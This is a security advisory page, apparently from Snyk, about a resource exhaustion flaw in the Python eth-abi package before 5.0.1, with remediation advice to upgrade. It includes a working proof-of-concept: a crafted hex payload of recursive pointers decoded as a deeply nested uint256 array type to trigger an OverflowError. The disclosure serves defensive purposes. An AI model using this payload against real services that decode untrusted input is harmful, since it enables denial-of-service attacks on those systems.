Resource Exhaustion Affecting eth-abi package, versions [,5.0.1)
Snyk CVSS
Attack Complexity
Low
Threat Intelligence
Exploit Maturity
Proof of concept
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-PYTHON-ETHABI-6394102
- published 6 Mar 2024
- disclosed 5 Mar 2024
- credit Paul Miller
How to fix?
Upgrade eth-abi to version 5.0.1 or higher.
Overview
eth-abi is an eth_abi: Python utilities for working with Ethereum ABI definitions, especially encoding and decoding
Affected versions of this package are vulnerable to Resource Exhaustion due to a recursive pointer issue. An attacker can cause a denial of service by sending a specially crafted payload that triggers an OverflowError.
PoC
from eth_abi import decode
payload = "0000000000000000000000000000000000000000000000000000000000000020000000000000000000000000000000000000000000000000000000000000000a0000000000000000000000000000000000000000000000000000000000000020000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000020000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000020000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000020"
# OverflowError: Python int too large to convert to C ssize_t
#decode(['(uint256[][][][][][][][][][])'], bytearray.fromhex(payload))
decode(['uint256[][][][][][][][][][]'], bytearray.fromhex(payload+('00' * 1024)))